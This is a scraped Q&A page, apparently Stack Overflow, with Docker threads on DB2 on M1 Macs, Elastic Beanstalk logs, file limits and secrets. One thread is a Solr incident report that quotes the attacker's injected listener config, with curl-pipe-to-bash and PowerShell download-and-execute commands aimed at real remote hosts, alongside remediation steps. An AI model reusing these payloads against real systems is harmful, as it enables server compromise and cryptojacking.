ibmcom/db2 docker image fails on m1 - linux

I'm having trouble setting up DB2 on macOS via Docker on my M1-Max MacBook Pro (32 GB RAM). I already had a look at this question, which might be related, however there is not a lot of information and I cannot exactly say, if it is about the exact same thing.
I set up following docker-compose.yml:
version: '3.8'
services:
db2:
image: ibmcom/db2
platform: linux/amd64
container_name: db2-test
privileged: true
environment:
LICENSE: "accept"
DB2INSTANCE: "db2dude"
DB2INST1_PASSWORD: "db2pw"
DBNAME: "RC1DBA"
BLU: "false"
ENABLE_ORACLE_COMPATIBILITY: "false"
UPDATEVAIL: "NO"
TO_CREATE_SAMPLEDB: "false"
REPODB: "false"
IS_OSXFS: "true"
PERSISTENT_HOME: "true"
HADR_ENABLED: "false"
ETCD_ENDPOINT: ""
ETCD_USERNAME: ""
ETCD_PASSWORD: ""
volumes:
- ~/workspace/docker/db2-error/db2/database:/database
- ~/workspace/docker/db2-error/db2/db2_data:/db2_data
ports:
- 50000:50000
on my Intel-MacBook, this spins up without any issue, on my M1-MacBook however I see after Task #4 finished, I see following portion inside of the STDOUT:
DBI1446I The db2icrt command is running.
DBI1070I Program db2icrt completed successfully.
(*) Fixing /etc/services file for DB2 ...
/bin/bash: db2stop: command not found
From what I could figure out, the presence of (*) Fixing /etc/services file for DB2 ... already seems to be wrong (since it does not appear in my intel log and does not sound like everything's fine) and the /bin/bash: db2stop: command not found appears due to line 81 of /var/db2_setup/include/db2_common_functions, which states su - ${DB2INSTANCE?} -c 'db2stop force'.
As far as I understand, su - should run with the path of the target user. In every single .profile or .bashrc in the home directory, the ~/sqllib/db2profile is being sourced (via . /database/config/db2dude/sqllib/db2profile).
However, when as root inside of the container (docker exec -it db2-test bash), calling su - db2dude -c 'echo $PATH', it prints /usr/local/bin:/bin:/usr/bin. Therefore, the PATH obviously is not as expected.
Maybe someone can figure out, what's happening at this point. I also tried running Docker with "new Virtualization framework", which did not change anything. I assume, Dockers compatibility magic might not be perfect, however I'm looking forward to find some kind of workaround, maybe by building an image upon ibmcom/db2.
I highly appreciate your time and advice. Thanks a lot in advance.

As stated in #mshabou's answer, there is no support yet. One way you can still make it work is by prepending your Docker command with DOCKER_DEFAULT_PLATFORM=linux/amd64 or executing export DOCKER_DEFAULT_PLATFORM=linux/amd64 in your shell before starting the container.
Alternatively, you can also use colima. Install colima as described on their GitHub page and then start it in emulated mode like colima start --arch x86_64. Now you will be able to use your ibmcom/db2 image the way you're used to (albeit with decreased performance).

db2 is not supported on ARM architecture, only theses Architectures are supported: amd64, ppc64le, s390x
https://hub.docker.com/r/ibmcom/db2

Related

Elastic Beanstalk: log task customization on Amazon Linux 2 platforms

I'm wondering how to do log task customization in the new Elastic Beanstalk platform (the one based on Amazon Linux 2). Specifically, I'm comparing:
Old: Single-container Docker running on 64bit Amazon Linux/2.14.3
New: Single-container Docker running on 64bit Amazon Linux 2/3.0.0
(My question actually has nothing to do with Docker as such, I'm speculating the problem exist for any of the new Elastic Beanstalk platforms).
Previously I could follow Amazon's recipe, meaning put a file into /opt/elasticbeanstalk/tasks/bundlelogs.d/ and it would then be acted upon. This is no longer true.
Has this changed? I can't find it documented. Anyone been successful in doing log task customization on the newer Elastic Beanstalk platform? If so, how?
Minimal working example
I've created a minimal working example and deployed on both platforms.
Dockerfile:
FROM ubuntu
COPY daemon-run.sh /daemon-run.sh
RUN chmod +x /daemon-run.sh
EXPOSE 80
ENTRYPOINT ["/daemon-run.sh"]
Dockerrun.aws.json:
{
"AWSEBDockerrunVersion": "1",
"Logging": "/var/mydaemon"
}
daemon-run.sh:
#!/bin/bash
echo "Starting daemon" # output to stdout
mkdir -p /var/mydaemon/deeperlogs
while true; do
echo "$(date '+%Y-%m-%dT%H:%M:%S%:z') Hello World" >> /var/mydaemon/deeperlogs/app_$$.log
sleep 5
done
.ebextensions/mydaemon-logfiles.config:
files:
"/opt/elasticbeanstalk/tasks/bundlelogs.d/mydaemon-logs.conf" :
mode: "000755"
owner: root
group: root
content: |
/var/log/eb-docker/containers/eb-current-app/deeperlogs/*.log
If I do "Full Logs" action on the old platform I would get a ZIP with my deeperlogs included
inside var/log/eb-docker/containers/eb-current-app. On the new platform I don't.
Investigation
If you look on the disk you'll see that the new Elastic Beanstalk doesn't have a /opt/elasticbeanstalk/tasks folder at all, unlike the old one. Hmm.
On Amazon Linux 2 the folder is:
/opt/elasticbeanstalk/config/private/logtasks/bundle
The .ebextensions/mydaemon-logfiles.config should be:
files:
"/opt/elasticbeanstalk/config/private/logtasks/bundle/mydaemon-logs.conf":
mode: "000644"
owner: root
group: root
content: |
/var/mydaemon/deeperlogs/*.log
container_commands:
append_deeperlogs_to_applogs:
command: echo -e "\n/var/log/eb-docker/containers/eb-current-app/deeperlogs/*" >> /opt/elasticbeanstalk/config/private/logtasks/bundle/applogs
The mydaemon-logfiles.config also adds deeperlogs into applogs file. Without it deeperlogs will not be included in the download log zip bundle. Which is intresting, because the folder will be in the correct location, i.e., /var/log/eb-docker/containers/eb-current-app/deeperlogs/. But without being explicitly listed in applogs, it will be skipped when zip bundle is being generated.
I tested it with single docker environment (3.0.1).
The full log bundle successful contained deeperlogs with correct log data:
Hope that this will help. I haven't found any references for that. AWS documentaiton does not document this, as it is mostly based on Amazon Linux 1, not Amazon Linux 2.
Amazon has fixed this problem in version of the Elastic Beanstalk AL2 platforms released on 04-AUG-2020.
It has been fixed so that log task customization on AL2-based platforms now works the way it has always worked (i.e. on the prevision generation AL2018 platforms) and you can therefore follow the official documentation in order to make this happen.
Succesfully tested with platform "Docker running on 64bit Amazon Linux 2/3.1.0". If you (still) use "Docker running on 64bit Amazon Linux 2/3.0.x" then you must use the undocumented workaround described in Marcin's answer but you are probably better off by upgrading your platform version.
As of 2021/11/05, I tried the accepted answer and various other examples including the latest official documentation on using the .ebextensions folder with *.config files without success.
Most likely something I was doing wrong but here's what worked for me.
The version I'm using: Docker running on 64bit Amazon Linux 2/3.4.8
Simply, add a volume to your docker-compose.yml file to share your application logs to the Elastic Beanstalk log directory.
Example docker-compose.yml:
version: "3.9"
services:
app:
build: .
ports:
- "80:80"
user: root
volumes:
- ./:/var/www/html
# "${EB_LOG_BASE_DIR}/<service name>:<log directory inside container>
- "${EB_LOG_BASE_DIR}/app:/var/www/html/application/logs" # ADD THIS LINE
env_file:
- .env
For more info, here's the documentation I followed.
Hopefully, this helps future readers like myself 👍

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes

How do I run Linux tasks without Docker (on the underlying system)?

Tasks image_resource property is marked as optional in the documentation, but GNU/Linux tasks fail without it.
Also, the docs for the type property of image_resource say:
Required. The type of the resource. Usually docker-image
But I couldn't find any information about other supported types.
How can I run tasks on the underlying system without any container technology, like in my Windows and macOS workers?
In Concourse, you really are not supposed to do anything outside of Docker. That is one of the main features. Concourse runs in Docker containers and starts new containers for each build. If you want to run one or more Linux commands in sh or bash in the container, you can try something like this below, for your task config.
- task: linux
config:
platform: linux
image_resource:
type: docker-image
source: {repository: ubuntu, tag: '18.04'}
run:
dir: /<path-to-dir>
path: sh
user: root
args:
- -exc
- |
echo "Running in Linux!"
ls
scp <you#your-host-machine:file> .
telnet <your-host-machine>
<whatever>
...

Haskell installation in docker container using stack failing: too many open files

I have a simple Dockerfile
FROM haskell:8
WORKDIR "/root"
CMD ["/bin/bash"]
which I run mounting pwd folder to "/root". In my current folder I have a Haskell project that uses stack (funblog). I configured in stack.yml to use "lts-7.20" resolver, which aims to install ghc-8.0.1.
Inside the container, after running "stack update", I ran "stack setup" but I am getting "Too many open files in system" during GHC compilation.
This is my stack.yaml
flags: {}
packages:
- '.'
- location:
git: https://github.com/agrafix/Spock.git
commit: 2c60a48b2c0be0768071cc1b3c7f14590ffcc7d6
subdirs:
- Spock
- Spock-core
- reroute
- location:
git: https://github.com/agrafix/Spock-digestive.git
commit: 4c85647427e21bbaefbf04c4bc315d4bdfabba0e
extra-deps:
- digestive-bootstrap-0.1.0.1
- blaze-bootstrap-0.1.0.1
- digestive-functors-blaze-0.6.0.6
resolver: lts-7.20
One import note: I don't want to use Docker to deploy the app, just to compile it, i.e. as part of my dev process.
Any ideas?
Should I use another image without ghc pre-installed to use with docker? Which one?
update
Yes, I could use the built-in GHC in the container and it is a good idea, but wondered if there is any issue building GHC within Docker.
update 2
For anyone wishing to reproduce (on MAC OSX by the way), you can clone repo https://github.com/carlosayam/funblog and grab this commit 9446bc0e52574cc574a9eb5f2733f69e07b874ef
(I will probably move on using container's GHC)
By default, Docker for macOS limits number of file descriptors to avoid hitting macOS system-wide limits (default limit is 900). To increase the limit, follow these commands:
$ cd ~/Library/Containers/com.docker.docker/Data/database/
$ git reset --hard
HEAD is now at 9410b78 last-start-time changed at 1480947038
$ cat com.docker.driver.amd64-linux/slirp/max-connections
900
$ echo 1200 > com.docker.driver.amd64-linux/slirp/max-connections
$ git add com.docker.driver.amd64-linux/slirp/max-connections
$ git commit -s -m 'Update the maximum number of connections'
[master 227a248] Update the maximum number of connections
1 file changed, 1 insertion(+), 1 deletion(-)
Then check the notice messages by:
$ syslog -k Sender Docker
<Notice>: updating connection limit to 1200
To check how many files you got open, run: sysctl kern.num_files.
To check what's your current limit, run: sysctl kern.maxfiles.
To increase it system-wide, run: sysctl -w kern.maxfiles=20480.
Source: Containers become unresponsive due to "too many connections".
See also: Docker: How to increase number of open files limit.
On Linux, you can also try to run Docker with --ulimit, e.g.
docker run --ulimit nofile=5000:5000 <image-tag>
Source: Docker error: too many open files

Docker and securing passwords

I've been experimenting with Docker recently on building some services to play around with and one thing that keeps nagging me has been putting passwords in a Dockerfile. I'm a developer so storing passwords in source feels like a punch in the face. Should this even be a concern? Are there any good conventions on how to handle passwords in Dockerfiles?
Definitely it is a concern. Dockerfiles are commonly checked in to repositories and shared with other people. An alternative is to provide any credentials (usernames, passwords, tokens, anything sensitive) as environment variables at runtime. This is possible via the -e argument (for individual vars on the CLI) or --env-file argument (for multiple variables in a file) to docker run. Read this for using environmental with docker-compose.
Using --env-file is definitely a safer option since this protects against the secrets showing up in ps or in logs if one uses set -x.
However, env vars are not particularly secure either. They are visible via docker inspect, and hence they are available to any user that can run docker commands. (Of course, any user that has access to docker on the host also has root anyway.)
My preferred pattern is to use a wrapper script as the ENTRYPOINT or CMD. The wrapper script can first import secrets from an outside location in to the container at run time, then execute the application, providing the secrets. The exact mechanics of this vary based on your run time environment. In AWS, you can use a combination of IAM roles, the Key Management Service, and S3 to store encrypted secrets in an S3 bucket. Something like HashiCorp Vault or credstash is another option.
AFAIK there is no optimal pattern for using sensitive data as part of the build process. In fact, I have an SO question on this topic. You can use docker-squash to remove layers from an image. But there's no native functionality in Docker for this purpose.
You may find shykes comments on config in containers useful.
Our team avoids putting credentials in repositories, so that means they're not allowed in Dockerfile. Our best practice within applications is to use creds from environment variables.
We solve for this using docker-compose.
Within docker-compose.yml, you can specify a file that contains the environment variables for the container:
env_file:
- .env
Make sure to add .env to .gitignore, then set the credentials within the .env file like:
SOME_USERNAME=myUser
SOME_PWD_VAR=myPwd
Store the .env file locally or in a secure location where the rest of the team can grab it.
See: https://docs.docker.com/compose/environment-variables/#/the-env-file
Docker now (version 1.13 or 17.06 and higher) has support for managing secret information. Here's an overview and more detailed documentation
Similar feature exists in kubernetes and DCOS
You should never add credentials to a container unless you're OK broadcasting the creds to whomever can download the image. In particular, doing and ADD creds and later RUN rm creds is not secure because the creds file remains in the final image in an intermediate filesystem layer. It's easy for anyone with access to the image to extract it.
The typical solution I've seen when you need creds to checkout dependencies and such is to use one container to build another. I.e., typically you have some build environment in your base container and you need to invoke that to build your app container. So the simple solution is to add your app source and then RUN the build commands. This is insecure if you need creds in that RUN. Instead what you do is put your source into a local directory, run (as in docker run) the container to perform the build step with the local source directory mounted as volume and the creds either injected or mounted as another volume. Once the build step is complete you build your final container by simply ADDing the local source directory which now contains the built artifacts.
I'm hoping Docker adds some features to simplify all this!
Update: looks like the method going forward will be to have nested builds. In short, the dockerfile would describe a first container that is used to build the run-time environment and then a second nested container build that can assemble all the pieces into the final container. This way the build-time stuff isn't in the second container. This of a Java app where you need the JDK for building the app but only the JRE for running it. There are a number of proposals being discussed, best to start from https://github.com/docker/docker/issues/7115 and follow some of the links for alternate proposals.
An alternative to using environment variables, which can get messy if you have a lot of them, is to use volumes to make a directory on the host accessible in the container.
If you put all your credentials as files in that folder, then the container can read the files and use them as it pleases.
For example:
$ echo "secret" > /root/configs/password.txt
$ docker run -v /root/configs:/cfg ...
In the Docker container:
# echo Password is `cat /cfg/password.txt`
Password is secret
Many programs can read their credentials from a separate file, so this way you can just point the program to one of the files.
run-time only solution
docker-compose also provides a non-swarm mode solution (since v1.11:
Secrets using bind mounts).
The secrets are mounted as files below /run/secrets/ by docker-compose. This solves the problem at run-time (running the container), but not at build-time (building the image), because /run/secrets/ is not mounted at build-time. Furthermore this behavior depends on running the container with docker-compose.
Example:
Dockerfile
FROM alpine
CMD cat /run/secrets/password
docker-compose.yml
version: '3.1'
services:
app:
build: .
secrets:
- password
secrets:
password:
file: password.txt
To build, execute:
docker-compose up -d
Further reading:
mikesir87's blog - Using Docker Secrets during Development
My approach seems to work, but is probably naive. Tell me why it is wrong.
ARGs set during docker build are exposed by the history subcommand, so no go there. However, when running a container, environment variables given in the run command are available to the container, but are not part of the image.
So, in the Dockerfile, do setup that does not involve secret data. Set a CMD of something like /root/finish.sh. In the run command, use environmental variables to send secret data into the container. finish.sh uses the variables essentially to finish build tasks.
To make managing the secret data easier, put it into a file that is loaded by docker run with the --env-file switch. Of course, keep the file secret. .gitignore and such.
For me, finish.sh runs a Python program. It checks to make sure it hasn't run before, then finishes the setup (e.g., copies the database name into Django's settings.py).
There is a new docker command for "secrets" management. But that only works for swarm clusters.
docker service create
--name my-iis
--publish target=8000,port=8000
--secret src=homepage,target="\inetpub\wwwroot\index.html"
microsoft/iis:nanoserver
The issue 13490 "Secrets: write-up best practices, do's and don'ts, roadmap" just got a new update in Sept. 2020, from Sebastiaan van Stijn:
Build time secrets are now possible when using buildkit as builder; see the blog post "Build secrets and SSH forwarding in Docker 18.09", Nov. 2018, from Tõnis Tiigi.
The documentation is updated: "Build images with BuildKit"
The RUN --mount option used for secrets will graduate to the default (stable) Dockerfile syntax soon.
That last part is new (Sept. 2020)
New Docker Build secret information
The new --secret flag for docker build allows the user to pass secret information to be used in the Dockerfile for building docker images in a safe way that will not end up stored in the final image.
id is the identifier to pass into the docker build --secret.
This identifier is associated with the RUN --mount identifier to use in the Dockerfile.
Docker does not use the filename of where the secret is kept outside of the Dockerfile, since this may be sensitive information.
dst renames the secret file to a specific file in the Dockerfile RUN command to use.
For example, with a secret piece of information stored in a text file:
$ echo 'WARMACHINEROX' > mysecret.txt
And with a Dockerfile that specifies use of a BuildKit frontend docker/dockerfile:1.0-experimental, the secret can be accessed.
For example:
# syntax = docker/dockerfile:1.0-experimental
FROM alpine
# shows secret from default secret location:
RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
# shows secret from custom secret location:
RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar
This Dockerfile is only to demonstrate that the secret can be accessed. As you can see the secret printed in the build output. The final image built will not have the secret file:
$ docker build --no-cache --progress=plain --secret id=mysecret,src=mysecret.txt .
...
#8 [2/3] RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret
#8 digest: sha256:5d8cbaeb66183993700828632bfbde246cae8feded11aad40e524f54ce7438d6
#8 name: "[2/3] RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret"
#8 started: 2018-08-31 21:03:30.703550864 +0000 UTC
#8 1.081 WARMACHINEROX
#8 completed: 2018-08-31 21:03:32.051053831 +0000 UTC
#8 duration: 1.347502967s
#9 [3/3] RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar
#9 digest: sha256:6c7ebda4599ec6acb40358017e51ccb4c5471dc434573b9b7188143757459efa
#9 name: "[3/3] RUN --mount=type=secret,id=mysecret,dst=/foobar cat /foobar"
#9 started: 2018-08-31 21:03:32.052880985 +0000 UTC
#9 1.216 WARMACHINEROX
#9 completed: 2018-08-31 21:03:33.523282118 +0000 UTC
#9 duration: 1.470401133s
...
The 12-Factor app methodology tells, that any configuration should be stored in environment variables.
Docker compose could do variable substitution in configuration, so that could be used to pass passwords from host to docker.
Starting from Version 20.10, besides using secret-file, you could also provide secrets directly with env.
buildkit: secrets: allow providing secrets with env moby/moby#41234 docker/cli#2656 moby/buildkit#1534
Support --secret id=foo,env=MY_ENV as an alternative for storing a secret value to a file.
--secret id=GIT_AUTH_TOKEN will load env if it exists and the file does not.
secret-file:
THIS IS SECRET
Dockerfile:
# syntax = docker/dockerfile:1.3
FROM python:3.8-slim-buster
COPY build-script.sh .
RUN --mount=type=secret,id=mysecret ./build-script.sh
build-script.sh:
cat /run/secrets/mysecret
Execution:
$ export MYSECRET=theverysecretpassword
$ export DOCKER_BUILDKIT=1
$ docker build --progress=plain --secret id=mysecret,env=MYSECRET -t abc:1 . --no-cache
......
#9 [stage-0 3/3] RUN --mount=type=secret,id=mysecret ./build-script.sh
#9 sha256:e32137e3eeb0fe2e4b515862f4cd6df4b73019567ae0f49eb5896a10e3f7c94e
#9 0.931 theverysecretpassword#9 DONE 1.5s
......
With Docker v1.9 you can use the ARG instruction to fetch arguments passed by command line to the image on build action. Simply use the --build-arg flag. So you can avoid to keep explicit password (or other sensible information) on the Dockerfile and pass them on the fly.
source: https://docs.docker.com/engine/reference/commandline/build/ http://docs.docker.com/engine/reference/builder/#arg
Example:
Dockerfile
FROM busybox
ARG user
RUN echo "user is $user"
build image command
docker build --build-arg user=capuccino -t test_arguments -f path/to/dockerfile .
during the build it print
$ docker build --build-arg user=capuccino -t test_arguments -f ./test_args.Dockerfile .
Sending build context to Docker daemon 2.048 kB
Step 1 : FROM busybox
---> c51f86c28340
Step 2 : ARG user
---> Running in 43a4aa0e421d
---> f0359070fc8f
Removing intermediate container 43a4aa0e421d
Step 3 : RUN echo "user is $user"
---> Running in 4360fb10d46a
**user is capuccino**
---> 1408147c1cb9
Removing intermediate container 4360fb10d46a
Successfully built 1408147c1cb9
Hope it helps! Bye.
Something simply like this will work I guess if it is bash shell.
read -sp "db_password:" password | docker run -itd --name <container_name> --build-arg mysql_db_password=$db_password alpine /bin/bash
Simply read it silently and pass as argument in Docker image. You need to accept the variable as ARG in Dockerfile.
While I totally agree there is no simple solution. There continues to be a single point of failure. Either the dockerfile, etcd, and so on. Apcera has a plan that looks like sidekick - dual authentication. In other words two container cannot talk unless there is a Apcera configuration rule. In their demo the uid/pwd was in the clear and could not be reused until the admin configured the linkage. For this to work, however, it probably meant patching Docker or at least the network plugin (if there is such a thing).

Resources